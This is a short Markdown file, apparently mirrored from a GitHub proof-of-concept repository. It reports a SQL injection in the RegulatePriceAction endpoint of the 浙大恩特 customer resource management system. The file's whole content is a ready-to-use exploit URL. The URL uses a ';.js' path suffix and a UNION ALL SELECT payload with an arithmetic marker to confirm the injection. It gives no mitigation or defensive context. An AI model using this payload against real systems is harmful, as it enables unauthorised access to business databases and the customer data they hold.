mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
8 lines
246 B
Markdown
8 lines
246 B
Markdown
|
|
## 浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入
|
||
|
|
|
||
|
|
## poc
|
||
|
|
```
|
||
|
|
/entsoft/RegulatePriceAction.entsoft;.js?method=getRegulatePricedlist®ulatepcnum=1'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,111*111--+aaaa
|
||
|
|
|
||
|
|
```
|